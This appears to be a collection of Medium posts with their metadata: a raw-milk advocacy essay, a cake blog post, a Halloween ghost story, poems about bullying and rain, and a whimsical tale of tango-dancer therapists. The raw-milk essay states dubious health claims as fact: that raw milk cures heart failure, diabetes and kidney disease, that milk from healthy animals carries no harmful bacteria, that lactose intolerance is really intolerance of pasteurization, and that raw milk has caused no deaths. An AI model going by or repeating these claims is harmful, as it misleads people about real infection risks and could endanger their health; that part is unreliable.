Fresh Goat’s Milk (Image by Tauna Pierce)
Milk is one of the natural food items that we are being cheated out of. Government and commercial units are becoming more and more aggressive in their attempt to deprive us of clean, pure, raw milk from healthy, naturally grazed animals. In most states it is illegal for a dairy farmer to sell fresh, unadulterated, naturally occurring raw milk to consumers for their consumption.
Raw milk is a whole food
A “whole food” is an unaltered, unprocessed, unrefined naturally occurring traditional food with no added salts, preservatives, colorings — and certainly no chemical additives. It’s the stuff that is supposed to feed our bodies. Whole foods are full of essential proteins, vitamins and minerals, and in most cases provide immune system support and other healing properties in addition to basic nutrition. Milk, in its raw form is exactly this. It’s the very first food every mammal receives nourishment from, and humans throughout the entirety of our history have flourished on the life-giving milk of virtually any mammal that would let us have it, including goats, cattle, elk, camels, donkeys, horses, reindeer, sheep, water buffalo, yak and even seals.
Some anti-milk advocates say that it’s unnatural to drink another mammal’s milk. They claim that humans are the only species that consumes milk after we’ve been weaned from our mothers. That logic doesn’t hold ground with me. We eat the meat of other animals, the eggs other animals, and even the blood of other animals. We also use various parts of other animals in our medicines, our vaccines and our beauty products. So what makes the milk off limits? Most non-ruminant carnivorous mammals WILL drink milk if given the chance; they just lack the thumbs to get it out of another lactating animal. Canines, felines and rodents are among these, just to name a few.
Raw milk is medicine
Local Dairy Farm (Image by Tauna Pierce)
Milk has a bit of hidden magic in it, more than just a drink, milk is medicine. Many cultures, throughout history have used raw milk to treat various diseases. The Mayo Foundation used a diet of organic raw milk from grass-fed animals as medicine in the 1920’s. Even way back then it was already a proven remedy for heart failure, diabetes, kidney disease, chronic fatigue and obesity.
Dr. J.R. Crewe, MD in 1929 said “The experience of seeing many cases of illness improve rapidly on a diet of raw milk has suggested that much of modern disease is due to an increasing departure from simple methods of preparing plain foods.”
Over a period of 18 years, Dr. Crewe had great success treating a multitude of illnesses with raw milk and wrote that “practically all medical men are agreed as to the value of milk as a food, and as an important part of the diet in the treatment of many diseases”.
The main difference between Dr. Crewe’s time and today boils down, in my opinion, to politics and accountability. In those days there was no pasteurization and no monopolistic megafarms eating up all the small-scale local dairy farms (the largest dairy farms in the U.S. today house over 15,000 cows). Reputation itself was the key to surviving in hometown business — dairy or otherwise. If you were a farmer with a cow, and you wanted to sell your milk to the community, you’d best be sure that the pasture was clean, the cow was healthy, the milk was wholesome and collection methods were sanitary. This provided milk that did more than quench your thirst, it was one of Nature’s best remedies, and a growing number of today’s physicians are returning to that way of thinking. Many are actively involved in the raw milk movement and steer their patients away from pasteurized milk.
Image via MorgueFile
Raw milk is not pasteurized
Pasteurization is the process of heating milk to sterilize it, to kill any bacterium that could cause illness to humans. Unfortunately this sterilization technique is an indiscriminate killer and also renders dead the good bacteria needed for digestion and most of the nutritive value. Pasteurization is the murder of all the living things that make milk milk. To put it simply, pasteurized milk is dead milk — it has been sanitized to death.
The irony of this whole process is that milk, from a healthy, naturally grazed cow (or goat, or any other mammal for that matter) doesn’t contain harmful bacterium; quite the opposite, it is a colloidal compound of many living beneficial organisms. The harmful bacterial diseases that the industry is so concerned about protecting us from comes from secondary contamination — from unhealthy cows raised, fed, treated and milked in over-populated and unsanitary conditions. Pasteurization is a license for commercial dairy factories to raise animals in inhumane conditions, use dirty collection methods and produce poor quality milk — pasteurization cleans up and hides their ugly manure stained mess.
Funny thing is, pasteurization wipes out any bacterial evidence of dirty conditions, but it doesn’t kill the chemical cocktails that have been added to the cows that are producing the milk.
A recent study published in the Journal of Agricultural and Food Chemistry confirmed that an average glass of pasteurized milk bought from the grocery store can contain traces of anti-inflammatory drugs, steroids, antibiotics, and various painkillers. Not to mention the residues of pesticides, larvicides, fertilizers, heavy metals, GM food crops and artificial growth hormones — all of which continue to show strong potential for being human carcinogens.
Image by sable2327
Raw milk is not homogenized
Homogenization bursts the fat cells, making them smaller, and able to blend in with the rest of the milk. Some of you remember in the “old days” you had to shake the milk to mix it before drinking. The process of destroying this nutritious butter fat is not necessary, nor is it required; although, this does prevent consumers from using the cream to make their own butter and cheeses. This is very convenient to the commercial dairy industry that also sells butter, cheese and other dairy products.
Raw milk is illegal
According to the Centers for Disease Control and Prevention, milk is unsafe to drink in its naturally occurring state. They, along with the FDA, USDA and the commercial dairy industry (the largest of these conglomerates showed a net income of $40.2 million for 2011) claim to be looking out for our health and wellbeing by trying to eradicate the possibility of the sale of raw milk from the small scale farmer directly to the consumer.
To be fair, we must look at the CDC’s numbers. According to their website, approximately 800 people in the United States have gotten sick from drinking raw milk or eating cheese made from raw milk — since 1998. The Weston A. Price Foundation breaks those numbers down a little more: “An average of 112 illnesses each year were attributed to all raw dairy products, and 203 were attributed to pasteurized dairy products.”
To add a little context, about 24,000 food borne illnesses are reported each year, making only one half of one percent of these issues being attributed to raw milk and other raw dairy products combined.
The Alliance for Natural Health points out that in the 38 years data has been collected, there has not been one single death from consuming raw milk — compared to more than 80 deaths from pasteurized milk products during that same time frame.
In fact, the Center for Science in the Public Interest shows that raw milk isn’t even listed as one of the “Riskiest Foods Regulated by the FDA”. Leafy greens are far more apt to make you sick — an astounding 13,568 people became ill from lettuce, kale, spinach and cabbage during this particular study. So why isn’t it illegal to sell, purchase or consume a commercially processed salad? For a mere $4 you can get a McSalad handed to you without even getting out of your car — without a license, permit or age requirement.
For that matter, also according to CDC data, it is estimated that 450,000 preventable medication-related illnesses occur each year in the U.S. — with approximately 100,000 deaths each year from “proper” use of prescription drugs. And those who peddle these drugs are allowed to do so, legally, but a farmer cannot sell delicious life-supporting raw milk from a healthy, humanely raised cow to a neighbor who simply seeks natural foods for himself.
Via MorgueFile by stuartjessop
The outlaw status of raw milk is perplexing. Even more bewildering are the food products that are legal to sell for human consumption: “processed” foods, genetically modified foods, fast food in every combination, soft drinks, energy drinks, artificial sweeteners, preservatives, synthetic flavors and colorings — all of which have shown time and time again to cause everything from obesity to diabetes to heart disease and cancers of every flavor. These foods can be purchased by anyone anywhere with no legal ramifications. But my favorite local farmer cannot sell his cow’s milk to me.
Aside from protecting us from the very minute possibility of becoming sick from contaminated raw milk, there’s also the ‘lactose intolerance’ propaganda to weed through. It is estimated that up to 50 million Americans are lactose intolerant. This is an interesting slant — technically, however, we are pasteurization intolerant. Milk (in its natural state) comes equipped with the enzymes it takes to digest itself! These are wiped out in the pasteurization process; therefore, in my opinion, the above statistic shows that 50 million American bodies reject processed, pasteurized and homogenized milk.
It just doesn’t add up. What does add up, however, is the insane amount of profit that certain corporations make off of the manufacturing process of pasteurized milk and dairy products.
Milk is profit
This image borrowed from http://www.sodahead.com
So who has what to gain by controlling milk for the masses? Who is profiting off of all this milk madness? Well, it’s certainly not Mother Nature who provides the cows, and it’s not the cows who provide the milk, and believe it or not, it’s not even the farmer in most cases. Turns out there are only a very few companies who monopolize the market when it comes to selling to the dairy farmer what he “needs” — things like livestock feed, livestock vaccine, antibiotics, bovine growth hormones as well as modified plant seeds and the pesticides that trigger their growth.
Monsanto’s website boasts that “millions of tons of GM crops have been fed to farm animals for more than a decade.”
So Monsanto rears its ugly head again. This chemical company, and a hand full of other chemical manufacturers, is quickly taking over ownership of nearly our entire food supply. They are controlling our seeds (our food), our pharmaceuticals (our healthcare), our pesticides (our health problems) and yes, they also have their dirty hands in our milk.
According to USDA information, in the years between 1970 and 2006 commercially produced milk production doubled — from an average of 9,751 lbs per year (per cow) to 19,951 lbs per year (per cow).
Adding artificial hormones to commercial dairy cows had everything in the world to do with this drastic change — Monsanto developed recombinant bovine growth hormone (rBGH) during this timeframe. This synthetic hormone and its potential health risks are extremely controversial, due in part to it being produced through a genetically engineered E.coli.
This rGBH (trade name Posilac) has never been tested on humans — unless you count the unofficial “studies” that are being conducted today on the unsuspecting American public. Monstanto claims that testing the side effects of their artificial hormones is unnecessary. “Aspects of the GM crop which are the same as the non-GM counterpart do not require safety assessment” because the natural product and the GM product are “substantially equivalent” and “there is simply no practical way to learn anything via human studies of whole foods. This is why no existing food — conventional or GM -or food ingredient/additive has been subjected to this type of testing.”
So, following this particular rationale, shouldn’t raw milk also be “substantially equivalent” to pasteurized milk and thus be legal for consumption? Or for that matter, we should suppose that a rattlesnake is “substantially equivalent” to a rat snake and therefore be considered quite safe.
It’s important to note, that this same company, which plays a part in determining that milk from cows containing their chemicals is safe to consume, also manufactured Agent Orange, DDT, PCBs and dioxin. It’s also worth mentioning that Posilac has been banned from use (since 2000) in at least 27 countries including Canada, Japan and the entire European Union.
by MichelleBulgaria
Milk in summary — pasteurized VS pasture-ized
Raw milk = beneficial bacteria, helpful enzymes, proteins/amino acids, immune support, every known fat and water soluble vitamin, 20+ minerals, the ability to absorb calcium and vitamin D, complete nutrition, defense against diseases, the potential to cure certain allergies and illnesses — from cows that are more apt to be raised, fed and treated in healthy, humane conditions on the appropriate diet, by farmers who uphold an old fashioned idea of general accountability — and generally welcome you to visit their farm and meet the cows that will provide your milk.
Pasteurized milk = dead bacteria, dead enzymes, no phosphatase (which is essential for absorbing calcium), genetically engineered hormones, GM food fallout, traces of heavy metals, antibiotics and other synthetic pharmaceuticals, allergic reactions, lactose intolerance, and mounting evidence that shows an increase in health disorders (including arthritis, cardiovascular problems, diabetes, weight gain, asthma, etc.) — from megafarms where cows are kept in overcrowded, unhealthy conditions, kept away from their natural foods, fed synthetic feed, pumped full of artificial hormones, antibiotics and other drugs — and are kept conveniently out of the public view.
Although the sale of raw milk for human consumption is outlawed in most states, you can purchase raw milk from many small scale dairy farms for your pets to enjoy. For a list of raw milk suppliers in your area, visit http://www.realmilk.com. | https://medium.com/driftwood-chronicle/dont-kill-the-milk-the-raw-story-behind-real-milk-cd20ab038b17 | ['Tauna Pierce'] | 2016-11-18 14:03:58.774000+00:00 | ['Environmental Issues', 'Raw Milk', 'Local Food', 'Politics', 'Making A Difference'] |
‘Cake Is Life’ | ‘Cake Is Life’
I wish that cake was in front of me right now but it isn’t.
A box or two of Duncan Hines cake mix and container of completely oil-based icing always have a spot in my pantry…just in case a cake craving hits.
Birthday cake and vanilla ice cream together is one of my most favourite things to eat ever (close if not the same as cinnamon buns and popcorn).
For obvious reasons and even though part of me would like to, I don’t have one made at all times. Between Jeff and I (and I would throw my sister-in-law Amy in there if she lived with us) the entirety of the cake would probably be made and eaten every day.
One thing that I think is possibly a women-only phenomenon is eating cake and dessert in tiny slices…just to have that one more taste…until the whole piece or item is gone. True? False? (I’m ‘guilty’!)
While I would personally place pies in this category too as they are round and all, I’ll leave cakes on their own for now:
Besides birthday cake and ice cream — any type of cheesecake, DQ ice cream cake, Nana’s coffee cake, Swiss P’s raspberry torte, any kind of chocolate cake, angel food cake with whipped cream and strawberries, my mother-in-laws orange/chocolate pudding layer cake and Costco’s Tuxedo cake are desserts I hope to enjoy at least a few times each every year.
There isn’t always a reason or special occasion needed and after looking at this photo and writing about it…I think I’ll bake up one of those boxed cakes.
Why? Um, because it’s Thursday and cake is life.
What are your favs?
-Becky | https://medium.com/@beckyboughton/cake-is-life-aea31f44fbe8 | ['Becky Boughton'] | 2020-11-13 03:23:48.997000+00:00 | ['Cake', 'Baking', 'Life', 'Dessert', 'Cooking'] |
1981 Halloween | “Come on now, single file please!” the bus driver commandingly down the aisle. We’re heading off to the Halloween party at Mrs. Meyers house, and everybody was excited. Mrs. Meyer always throws the best parties. I hope she has the costume parade like last year. That was a blast! Speaking of which, I crane my neck to see all the costumes. There’s a witch, a pirate, and even Yoda! I look down at my costume, which is as basic as it can be, a ghost. We couldn’t afford any special ones, so my mother took a white bed sheet and cut holes for my eyes, mouth, and nose.
While I wait for the bus to start, I try to find Jeremy, my best friend. He always brings the best treats, and his house gives out the best candy during trick-o- treat. Caramello, bubble gum, and even toffee filled lollipops! Man, those were so good! I quickly find Jeremy in his superhero costume. “How’s it going?” I ask, plopping on the seat next to him. “Hey Will! Yeah, it’s been good. My mom got the candy from downtown, and its goin’ to be epic!” Jeremy responds back to me, stretching out in the seat. “Groovy.” I respond back, tugging on a corner of my costume. “We’re leaving in 5 minutes folks, make sure you have a seat!” I hear the bus driver say, so loud that my eardrums pop! “Get ready Will,” Jeremy says, his eyes gleaming. “Why?” I ask back, wondering what he was talking about. “It’s going to be a long ride.” he responds back, speaking in a way that I knew he was up to something. “Ok kiddo’s, we’re moving, so get your butt in a seat!” the bus driver says loudly, interrupting my train of thought. And with that, the bus begins to move, and I brace myself for the crazy ride.
As we pull out, I see a shadow outside the bus, moving with it, but there is no one in sight. I hug my bedsheet close to myself. “Hey Jeremy?” I ask him tentatively. “Hmm?” He responds back, staring out the window. “What is it that you have planned?” I ask, fearing the answer. Jeremy looks at me, and with a start I realize that something is off. Jeremy then says, “Watch out for The Shadow.” then he melts into a pool of darkness. I scream, but no sound escapes my mouth. I look around the bus, only to find no one left. I head up front to the head of the bus and find the bus driver there. She turns to look at me and says “Boo.” in the deadliest whisper. And with that, I melt into the darkness. | https://medium.com/@sethmi/1981-halloween-b02c9705f10f | [] | 2020-11-05 05:28:17.549000+00:00 | ['Spooky', 'Halloween', 'Short Story'] |
Bullies | Bullies
Photo by Camellia Yang on Unsplash
Bullies, you know who you are,
cloaked in your finery,
you do not fool me.
I’d recognize you anywhere,
you victimize and blame,
those weaker than you
more vulnerable
you play an ugly game.
Bullies, you must answer to yourselves,
look into the mirror
you can not live free.
I challenge all of you bullies,
to answer the truth of who you are:
the ugliness of shame.
Bullies, someone must have hurt you,
which you carry deep inside,
so I find myself forgiving you,
in spite of all my pain.
Bullies, you called me unspeakable names,
alleged I was trying to steal your boyfriends,
how could that be true,
unless I possessed some sort of magical power,
a modern-day Mata Hari, far surpassing you.
But these were all lies, untruths,
spoken by the three of you,
two sisters and a red head,
God is watching you.
Bullies, could you not apologize,
for those transgressions of bygone days.
Why not attempt to reconcile,
and in so doing, change your fate.
Bullies, I await your reply,
I have been waiting forty-two years,
my life was shattered into one thousand pieces,
I will never, ever be the same. | https://medium.com/illumination-curated/bullies-507252d4e61e | ['Amy Pierovich'] | 2020-12-12 05:47:21.227000+00:00 | ['Poetry', 'Pain', 'Forgiveness', 'Truth', 'Bullying'] |
A Rainy Day | Today is a rainy day
a cool, gray,
and a beautiful day
why people don’t like
rainy days
I wonder
The sound of the rain
hitting on the roof
raindrops running
down the windows
and running over
the ground like cats and dogs
the scent of wet soil
lightning and thunders
striking from the sky
the dance performed
between the wind and the trees
Today is a rainy day
a day to enjoy
before the manifestation
of mother nature | https://medium.com/illumination-curated/a-rainy-day-186a5644524e | ['Ivette Cruz'] | 2020-12-22 12:16:47.878000+00:00 | ['Positive Thinking', 'Life', 'Motivation', 'Inspiration', 'Poetry'] |
The Optimal Arousal of Bennie and Yvette, a Love Story | The Optimal Arousal of Bennie and Yvette, a Love Story
‘The middle ground is where life and love dance, where the music is played.’
Photo by Christiana Rivers on Unsplash
“But I LOVE Groynehilda!” Bennie shouted.
How he despaired. Would he ever recover from his bad case of RRE? It would kill his latest relationship, as it had all the others. Few things startled Dr. Ocaramia, but she jumped perceptibly off her mat. It wasn’t due so much to Bennie’s sudden outburst as to the tiny seed-germination of an idea his LOVE shout sparked, how to help this man.
“Love is the answer,” Dr. O said obliquely.
“Oh, I know, I know, Dr. O.”
The vowel repetition momentarily distracted her. How often had she thought that Tango, the thing that she and Bennie and all her clients shared, was a language of soft alphabet sounds, like sand in a breeze or water over pebbles. Tango had no hard boundaries like consonants in English, or other dances.
Before her sat a man of such balanced hard and soft symmetry. It was almost criminal the fabulous looks Bennie possessed. But he suffered, oh, oh, oh how he suffered. Benedict Lucky suffered severely from Don Juan syndrome. He was a lady killer through no fault of his own. There are those who would blame his mother. Then, thought Dr. O, they had best just blame the Great Mother. Dr. O knew that all of us have the DJ gene, located beside the first chakra, but for most of us, it remains dormant. It flared up into an extreme stubborn case for Bennie, partly triggered by his good looks.
“I believe you do . . . LOVE Groynhilde,” Dr. O said, shouting so Bennie knew she had heard him. She was a good listener, a skill that had served her well as a dancer and as a Tango dancer therapist.
Dr. Ocaramia specialized in treating Tango dancers because she had a deep and penetrating understanding of their peculiar disorders and problems. Every single one had a form of TAD, Tango Anxiety Disorder. The dance was a catalyst, like anything that you are passionate about and define your life through. The intensity of intimacy with others was wonderful and devastating at some point in each Tango dancer’s career. But Dr. O knew TAD had to do with what we bring to the partnership. No one can make us suffer but us. Tango, for her clientele, was the ultimate sifter of truth from fiction.
Dr. Ocaramia’s diagnoses for her special clients ran the gamut of the issues of the population at large, all of them rooted and nourished by one cause, Fear. Dr. O was’nt a trained therapist but had fallen into the practice because of a vow she took years before, to save all beings. “Saving one, you save millions,” she could often be heard muttering in her rare idle moments.
There had been an explosion of disorders, at least in her city as the Tango community matured and become more complex. Everything from OCD to PTSD to PMS manifest differently in Tango dancers. Dr. Ocaramia could help them all: The woman who had to sleep with her shoes on required only a feng shui correction in her closet. There was the man whose compulsion led him to build a hidden high-heeled shoe cubby in his closet for one-hundred pairs of vintage and recently used women’s Tango shoes.
“What’s wrong with that,” she asked?
She tried to send him away. But he needed six months of talking, researching the history of footwear, penetrating every belief on glamour before he was ready to leave happy the way he was. He generously gave her his favorite pair, 10-cenimeter stilettos in black suede with skimpy sandal foot and thin criss-cross ankle straps.
One woman came with a morbid fear of entering the dance hall and finding someone wearing the same dress. “So bring a change of clothing,” advised Dr. O and sent her away. Another woman had a recurring nightmare of entering the milonga stark naked. Same remedy: “Bring a change of clothing.” She had watched many leave her office-cum-dance-floor freed of their burden. She helped them by using a simple formula: show up, remain present, accept what they offered, and be kind, for the most part.
Bennie fidgeted in his chair. “I’ve been this way forever. I’m always looking at that next woman on the horizon. Always,” Bennie whined. Dr. O noticed that even with his most vulnerable display, he was a knockout. Dr. O relished not being KO’d by him. She had become immune since having Tango satori.
“Have you ever sailed?” she asked.
“Yes, don’t care for it, my idea of nothing to do.”
Dr. O thought of how people prone to seasickness are advised to stare at the horizon. But no, that was a silly thought. She was just gathering wool, remaining present, as Bennie wallowed in his own pain.
“Dr. O, please help me; tell me how to stop . . . to control my RRRE.”
“RRE,” she corrected.
“RRE . . rrrrrr,” he growled and she could see how badly it hurt. “Maybe . . . do you think? . . . I should stop Tango? I’m so tired of being the Casanova.” He raised his big blue eyes with such pleading, she saw instantly how their aqueous sheen could kill a woman. A wavy lock of his sandy hair fell forward temptingly. A jolt of electricity ran through her most tender meridians. She kept a calm façade.
Bennie, don’t worry, you will be saved. In her mind, she clicked on “Save as” in the pull-down menu. He could only be saved as himself. Therein lay the rub.
“Okay, Bennie. Just this once I’ll give you advice. Don’t stop Tango. It’s your poison, but also your medicine. Only you can figure out which to apply. It’s your life or no-life riddle, your koan, which if answered correctly leads to what you want above all else. Answer as you normally do, you get the normal result, pain. Your coming here to talk will clarify all.” Dr. O knew that words were superfluous. Everything we call reality is a form of placebo.
“Tell me again, how many women at last night’s milonga did you fantasize taking them to bed?” Not that the number mattered. It was part of the therapeutic process. In fact, numbers had a markedly adverse effect on Dr. O., removing her from her beloved connection to the faint path leading her client ineluctably from placebo-reality to the illusive moment of truth, the fear-killer that they both hunted.
“Only five,” Bennie answered weakly. He didn’t notice when Dr. O passed out for a nanosecond, her auto-protective device that clicks-in when disconnection occurs caused by the client’s stating, not truth, but numerical values. As she came to, he held up his left hand with his fingers spread in the air. “Zelda, Jillene, Arrabel, Fredericka, and Linguine.”
“Linguine?”
“That’s my name for her. She was thin, lanky, and I could coil her body around me like a giant snake of constrictor-pasta. Oh, man, we did a lot of leg wraps, left, right, and center. Ohhhhh . . . ,” he smiled lewd-a-sciviously. “I don’t recall her real name, but I was hungry at the time.”
“Uh-hummm, I see,” said Dr. O. “And, Groynehilda?”
“She was there. She understands, it’s just a dance, a three-minute love affair with a follower who is a stranger. What makes it so painful is that she trusts me to the core.”
“I see. Groynehilda is an enlightened woman, Mr. Lucky.” She made some mental notes. As she did, Bennie went off talking about his problem. How, after five marriages (Dr. O passed out) he was sure Groynehilda was it. He had met her family and assured her he wanted to marry forever this time, have children. But he had the most stubborn case of Rapidly Roving Eye.
Why was it that the most conventionally beautiful people suffered the most? Dr. O had yet to work that one out. Those with receding chins, small eyes, big noses, bowed legs, acne scars, balding, squat builds, funny butts, or just ordinary features seemed to be somehow vaccinated by their very imperfections against such anguish. But these beauties were fairytales in reverse. They started life with everything and then became miserable. They were the Walking Wounded.
The Walking Healed seemed to always be the protagonist with perceived defects. All it seemed to take for them to radiate that coveted divine beauty that transforms ugly ducklings into swans was the simple love of another. Or even that gourmet version, Self Love. But the beautiful people were led, or misled, to expect too much of themselves.
“Perhaps I need some sort of aversion therapy?” Bennie interrupted her silent speculation.
His desperation was over the top. “I was thinking exactly the opposite,” Dr. O said. She knew how badly he wanted to settle down with Groynehilda. It was hard to find a woman willing to make a commitment these days. “Bennie, when you go home today, indulge yourself. Sit in a quiet place and let thoughts of other women come up. But that’s all. Don’t stop them. Don’t hold on to them. Let them rip.”
“Well . . . if you say so . . .” Bennie looked slightly dubious.
“Oh, and this may sound contradictory, but don’t think too much and don’t, and I mean DO NOT touch yourself during the fantasy.”
“Huh?”
Dr. O was not thinking, but the face of Yvette Baisemoi, her only other client currently, arose in her mind. By some bizarre coincidence, like Bennie’s with his good looks, Yvette was a woman who made Liz Taylor, Ava Gardner, and Sophia Loren look like home girls. Yvette’s suffering was equal to that of Bennie’s and appeared to be caused by the same fear. Dr. O realized what Bennie and Yvette both needed was the same remedy. She would discuss her ideas later with Dr. Nureyev.
Seeing the doubt and bewildered look on Bennie’s face, Dr. O said, “Bennie, story time.”
“There was once a man whose entire life had failed him. Everything had let him down eventually beginning with Santa Claus and the tooth fairy: his parents, his wife and kids, his belief in Christianity, then Judaism, Islam, then Buddhism, Secular Humanism, Atheism, then Marxism, Communism, sailing, golfing, tennis, voodoo, you name it, even nature and the environment. The man had confided all of his failed searches for happiness in a friend, named Jeremiah, who believed himself to be his sole friend and confidant. The man died at 95, very old, but in good shape until the last week of his life. Even dying failed him. Jeremiah figured, being the man’s only friend, he had better go to the funeral for him. It turned out there were thousands of people at the funeral. The man had thousands of confidants, each one feeling he was the man’s sole friend and confidant in the world. The man had led a full and satisfying life out of being let down and sharing it with the world, one person at a time.”
“It’s an interesting story, Dr. O,” said Bennie, doubt still front and center.
“That man,” Dr. O said, “had, on a rotating basis, faith, doubt, and persistence, and the greatest of those three was doubt. He was never certain of being in the right place, doing the right thing. Never.”
“I see,” said Bennie, “he made a long lifetime out of it.”
“And many friends.” On some level, Dr. O hoped, Bennie understood we can’t change some of our hardware. We can only “Save as . . .” Suddenly, she clapped her hands twice.
“Oh no!” said Bennie. “Dr. N? Please . . . I didn’t mean to doubt . . . I mean, think.”
“Shh.” A pleated curtain in the doorway was drawn aside. A right foot in a butter-soft leather two-tone Hugo Boss shoe was extended forward onto its heel, then rolled soundlessly onto its metatarsals as the left foot pushed a man’s weight forward. It was Dr. Nureyev, dressed in an elegant gray silk Brioni suit. The soft-lavender vest he wore over his pin-striped Canali shirt might have been considered too dandy or Euro by American standards. But Dr. N was a longtime Tango dancer. His complexion glowed like that of a transformed protagonist in a fairytale. In fact, he had recently been reborn.
“Amigo,” Dr. N addressed Bennie.
Dr. O smiled. She had never seen him so relaxed in the old days before he had disappeared for forty days and forty nights. Dr. N was to blame for her immersion in Tango’s mysteries and in the problems and disorders of others. She’d been happy to not-think and dance. But he had been the one to lead her to a place in the dead of winter where she danced into the cosmos with a star dancer, Chilly Wainright. He had videotaped her and Chilly. The video disappeared. It was a lesson in ephemeral art. You can dance Tango. You cannot hold it still. Then Nureyev had disappeared. Only later, did Dr. O learn why.
“You rang, Dr. O?”
Dr. O nodded. “Please, check Bennie’s heart-to-brain ratio.” Dr. O’s office was situated off a big dance floor South of Market (SOMA), the hallowed ground for psychosomatic work.
“Pugliese, DiSarli, or Biagi?”
“Make it Piazzola,” said Dr. O. “I’ll tell you why later.”
Dr. N said, “C’mon Ben, lead me; You won’t know the difference between me and your latest thrill.
“Linguine…is the latest,” said Dr. O.
“Believe me, I’ll close my eyes . . . . hmmm nice after shave.”
“Thank you, it’s MOB cologne.”
“MOB?”
“My Own Blend, a mix of citrus, cedar, and heated wood shavings. Women love it.”
“Oh, it’s so heavenly,” said Bennie, inhaling the cloud of Dr. N’s fragrance rousing his senses.
“Righto, Ben. C’mon, stop breathing down my neck. Lead away.”
“Oh, Ben and Dr. N,” said Dr. O, “lots of CBM, please.”
CBM, or contra-body movement, Dr. O knew, was great for high anxiety. It was a tenet of Chinese medicine: When you moved your upper body in opposition to your lower body, it stimulated and scrambled both hemispheres of the brain, releasing confusion. That’s why yoga spinal twists were so calming. Dr. O and Dr. N knew that nothing bled the bad blood like Tango. Nothing.
Bad as Bennie’s RRE was, Dr. O was convinced he would pull through. She had helped a broad assortment of ailments, some easier to treat than they first appeared. Some patients simply needed the right bodywork — be it reiki, acupuncture, acupressure, deep-tissue massage, or a clearing with chiropractic manipulation — to rid them of body armor that common roadblock to joy. For some people, dream work or Bach flowers were needed. A woman who couldn’t stop counting the Tango beat in her head just needed to learn some yogic breathing and to listen to her heartbeat. “Ah, the rhythm of breath and heartbeat, aha,” said she, “who needs numbers?” Certainly not Dr. O. So elementary. Indeed.
There was the guy who had panic attacks as soon as he crossed the transom of a dance hall. Dr. O gave him a word imbued with power to make him feel like King of the Jungle. He had to say it three times at the threshold. It was Iguazu, a word that held the power of falling water seeking its own level and polishing hard rock to vowel-sound smoothness. That guy came back six months later to tell her how he had forgotten to say it one night and danced his best, no panic attack.
“So now you know?” she said.
“That I never needed that word.”
“Go in peace, your therapy is ended.”
There was the woman who hyper-smelled every possible off-odor: sock lint, mineral-rich sweat, toe jam, and scaly scalps. Another yoga specialist was called in to teach her to separate out the offending molecules from the pleasant ones, using the muscles of her nose and sinuses. Elementary. There was the man who was repulsed by most female body scent, leading him to engage in excessive approach-avoidance behavior while dancing. A rash of whiplash cases in followers was traced to his energetic lead. Aromatherapy, using leading brand perfumes combined with human and animal pheromones helped him become a truly inspired tanguero, able to flip repulsion to attraction during the course of one dance.
Drs. Ocaramia and Nureyev had both been transformed by the alchemical process of Tango and wanted to help others get there. When Dr. N disappeared, it had been to go off into the desert to complete his rebirth. Some people need to do that. Before he vanished, he had inspired Dr. O to start writing The Book of Tango (superfluous words!) and deconstruct true happiness. Which was hard when you did not think too much. Like Dr. N, Dr. O had experienced the Oneness that has no name, no eyes, no ears, no nose, no tongue, no body, no mind, no smell, no taste, no touch, etc. Dr. O did not yet know how that ONE was called.
Bennie and Dr. N were done dancing. Dr. O said, “Well?”
Dr. N nodded, “He’s dancing from his brain. Bennie, my boy, you gotta lead from nothingness, or the heart if that’s where you feel your partner.”
“I know, I know,” Bennie said, vexed, yet calm having just done a lot of CBM.
“So why Piazzola?” Dr. N asked.
“Because Astor Piazzola’s music has the purest heart-to-brain ratio. That’s why he didn’t want people to dance to his music,” explained Dr. O.
Bennie sighed and sat down. A bandoneon groaned and Dr. O said, “That’s our cue. Don’t get too comfortable, Bennie, your fifty-five minutes were long ago up.”
“OK. See you next week.” Bennie went to pull out his wallet. Dr. O reminded him to put it away.
“Oh, yes, pay it forward, will do.”
Dr. O didn’t take payment. For a long time now she had been on a divesting trend because it was much closer to bliss. In Tango, the closer the skin and the bone — the fewer things that came between you and your partner — the higher the bliss quotient. But it was not so much that Dr. O didn’t care about money or material things. It was that she was clinically bad with numbers. Little known fact: numbers were for her like Kryptonite for Superman; they robbed her of energy and of her powers. She had gotten through the basic eight-count of Tango only by popping her ears during the lesson as the teacher counted. It’s not that she believed numbers were unimportant — without them we would never have sent men to the moon or have the many wonders of the technological age. But Dr. O was among the chosen few (most of them Tango dancers) who had received the wisdom that other unexplored intelligence now lay where no numbers dared go.
Interestingly, Dr. O had no explanation for the number of physicists, architects, mathematicians, rocket scientists, financial planners, and all the hyper-number people who were attracted to Tango. However, these digitally-inclined guys were able to accomplish another astonishing feat: CMM, Contra-Mind-Movement, a delicious out-of-his-mind moving of body from the heart of his nothingness. Well, that’s how Dr. N explained it. A few strains of violins cried followed by a rhythmic bar of Biaggi on piano. “That must be Yvette Baisemoi. She’s early,” said Dr. O as Dr. N opened the door. Yvette entered as Bennie was leaving. Drs. O and N did not miss the eye-lock between Bennie and Yvette.
“Dr. O, Dr. N, sorry I’m early. I need to talk. PDQ,” said Yvette.
“Please sit and wait, Yvette, in the anteroom,” said Dr. O. “By Ben. Be Good.”
Bennie turned and said, “Hey Dr. O. That 95-year-old man. I’m wondering. Did he try Tango?”
“Ben, What is the essence of Tango?” Dr. O. replied.
Bennie understood. Another koan. He bowed and left.
Drs. O & N, two of the world’s greatest non-thinkers, sat down to discuss their clients. They had fifteen minutes to debrief. They shared a little Malbec in small goblets, a little wine (sometimes whine) to whet the brain, as Aristophanes said.
Dr. N sipped, then said, “So Bennie & Yvette. Has the ring of an Elton John song.”
Dr. O sipped and sighed, too. “Yes.”
“Yvette suffers from ILSE?”
Dr. O nodded. “Incredibly Low Self Esteem.”
Dr. N shook his head. Yvette’s other-worldly beauty was not wasted on him. He had an artistic appreciation for the female form. “It’s confusing, isn’t it? It comes off as superiority complex.”
“Yes,” said Dr. O, “The armor, the shield, the self defense. This Malbec is extra velvety today.” Dr. O listened for months to Yvette rail against every man she believed to be her equal who did not fall all over her and invite her to dance and remain under her spell. Those who did were obviously not her equal.
Dr. N swirled, sipped, swallowed, and said, “Yes, black velvet. If only you could tear that silly soul-constricting persona off of Yvette, Dr. O. All would be well. Underneath is a good person.”
Dr. O laughed. “You know better, Amigo.” How well he had been born again. “So, which desert?”
“Death Valley.”
“But, of course.”
“I was able to hang out in the many ghost towns and not be seen.”
“You and the video of me on cosmic tour with Chilly Wainright. Thanks a lot, Amigo.” She liked to give him digs. They went right through him.
“Don’t worry, it’ll materialize some day.”
They both knew that things only tend to exist. “How am I supposed to convince people I took a trip around the universe on an old wood floor,” she dug at him again.
“Don’t sweat. With Temple-of-Doom ferocity, I will find it.”
